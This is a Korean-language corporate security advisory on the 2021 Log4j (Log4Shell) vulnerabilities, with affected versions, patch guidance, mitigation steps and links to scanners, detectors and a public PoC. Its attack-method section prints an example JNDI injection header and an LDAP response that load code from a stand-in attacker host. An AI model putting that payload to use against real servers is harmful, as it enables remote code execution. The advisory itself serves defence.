IT Solutions

[긴급 알림][보안동향] Log4j 취약점 공격 피해 주의

2021. 12. 14. 09:41

최근 발표된 Log4j 관련 보안상 치명적인 결점이 발견됨에 따라 긴급 조치가 필요합니다.

 

1. 개요

 

● Log4j에서 발생한 보안 경고로, 대부분 인터넷서비스에 영향이 있는 최상급 위험도를 가진 보안 취약점입니다. (12/10 이슈화)

● 악성코드 감염, 원격 명령 실행 등 심각한 피해를 방지하기 위한 보완 패치가 발표됐습니다.

● 취약점 정보와 함께 스캐너 등 공격툴도 인터넷에 공개된 상황으로 신속한 대응이 필요합니다.

취약 대상 버전 : Log4j 2.0-beta9 ~ 2.14.1(CVE-2021-44228)

 

※ Log4j : 자바 기반 로깅 유틸리티로 로그를 자동으로 출력해 주는 도구로서

          서버, 프로그램의 운영 유지 관리 목적을 위해 범용으로 사용됩니다.

 

※12/30(목) 신규 업데이트

● 최근 Log4j의 다섯번째[1] 취약점(CVE-2021-44832)이 발견되었으며, CVSS는 6.6(medium)입니다.

● Log4j 2.17.0은 CVE-2021-44832를 해결하는 2.17.1로 패치해야 하며, 최신 버전 업데이트와 보안 조치를 필요합니다. [2] [3]

 

*참고 : [1] log4j취약점 발표 건수는 5건

à CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-4104, CVE-2021-44832

*참고 : [2] CVE-2021-44832 관련 체크막스 블로그:  https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/

*참고 : [3] NVD DB: NVD - CVE-2021-44832 (nist.gov)

 

※12/15(수) 신규 업데이트

● 최근 Log4j의 기존 보안 결점(CVE-2021-44228)을 우회해 공격할 수 있는 새로운 취약점이 발표됐습니다. 최신 버전 업데이트와 보안 조치를 필요합니다. [1]

● 주요 내용

- Apache Log4j 2에서 발생하는 DoS(Denial of Service, 서비스 거부) 공격 취약점(CVE 2021-45046) [2]

취약 대상 버전 : Apache Log4j 2.0-beta9 ~ 2.12.1, 2.13.0 ~ 2.15.0

 

*참고 : [1] https://logging.apache.org/log4j/2.x/

*참고 : [2] https://logging.apache.org/log4j/2.x/security.html#CVE-2021-45046

 

2. 특징

 

● 해커가 시스템의 모든 정보에 접근할 수 있는 권한을 획득할 수 있을 정도로 위험도가 높습니다.

● 웹서비스, 클라우드, IT솔루션 등 광범위한 서비스에 사용돼 피해 발생 가능성도 높습니다.

 ※ 제조사별 현황

- https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

 

3. 공격 방식

 

상세 공격 기법(예시)

1]  GET /anything HTTP/1.1

     User-Agent:  ${jndi:ldap://attacker.com/a}     <= LDAP* 요청 구문

※ LDAP : 사용자/시스템/서비스 등의 정보를 찾아볼 수 있도록 하는 프로토콜입니다.

 

2] Query LDAP

 

3] LDAP Response

    ....

    javaCodeBase: http://attacker.com

    javaFactory: Exploit

 

4] 원격명령실행(RCE) 유형의 Malware 설치합니다.

   * RCE: remote code execution

  

4. 대응 방안

 

● 아래의 버전으로 업데이트해야 합니다. [4][5]
- (Java 8 이상) 2.16.0
- (Java 7) 2.12.2

 

● (모든 버전) JndiLookup 클래스를 경로에서 제거 : zip -q -d log4j-core-*.jarorg/apache/logging/log4j/core/lookup/JndiLookup.class
 ※ 기존 환경 변수를 이용한 조치를 한 경우, 이번 DoS 취약점(CVE 2021-45046)에 취약합니다.

 

● 현재 log4j 취약점이 공개된 직후 외부에서 기업 네트워크 망을 공격하는 형태가 두드러지고 있습니다. 위험도를 감안해 외부에서 접속가능한 시스템부터 순차적으로(1차 외부망 & 2차 내부망) 보안 패치를 진행하는 것을 권장합니다.

 

1차) 외부망에서 직접 접속가능한 시스템 : 홈페이지 등 (ID/암호로 접속하는 사이트도 포함)
2차) 내부망 : 그룹웨어 등 사내시스템

 

*참고 : [4] https://logging.apache.org/log4j/2.x/download.html

*참고 : [5] https://logging.apache.org/log4j/log4j-2.12.1/download.html

 

● 공격 정보 차단

- 현재까지 알려진 위협정보를 기반으로 보안 패치 적용을 권고합니다.

- 공격 정보를 차단해 일부 방어가 가능합니다.

 

- 웹방화벽/IPS 차단 정책 적용(9개)

- 공격 IP 차단(33개)

※ 위에 제시한 격 구문과 IP 외 추가 위협 정보가 있으나, 현재까지 파악된 주요 위협 정보로 향후 추가될 수 있습니다.

 

log4j 취약점 대응 FAQ

 

 

[참고 자료]

- KISA 공지 : https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389
- 공격 설명 [1] : https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
- 공격 설명 [2] : https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j
- 제조사별 현황 : https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
- 참고 log4j 2 : https://logging.apache.org/log4j/2.x/
- 참고 log4j 1.2 - https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389
- 참고 log4j 1 : https://logging.apache.org/log4j/1.2/
- KrCERT : www.krcert.or.kr
- 참고 log4j 해킹툴 POC : https://github.com/kozmer/log4j-shell-poc
- 로그프레소 점검툴(Windows, Linux, Any OS) : https://github.com/logpresso/CVE-2021-44228-Scanner 
- log4j RCE Exploitation Detection(리눅스 Shell) : https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
- log4shell-detector(Python 기반) : https://github.com/Neo23x0/log4shell-detector
- 참고 Security Advisories /Bulleins linked to Log4Shell : https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
- Yara Rule : https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar
- CISCO TALOS 차단 권고 : https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
- 참고 log4j 공격 탐지(로그 이력 점검) : https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
- 참고 : https://dev.classmethod.jp/articles/aws-waf-log4jrce-cloudformation/
- Apache Log4j cve example repo and docker images https://github.com/justincormack/log4jpoc
- https://soltech.lgcns.com/tuna/notice/1222

 

 

글 ㅣ LG CNS 보안사업담당

 

*해당 콘텐츠는 저작권법에 의해 보호받는 저작물로 LG CNS 블로그에 저작권이 있습니다.
*해당 콘텐츠는 사전 동의없이 2차 가공 및 영리적인 이용을 금하고 있습니다.

 

 

Posted by LG CNS

댓글을 달아 주세요

위로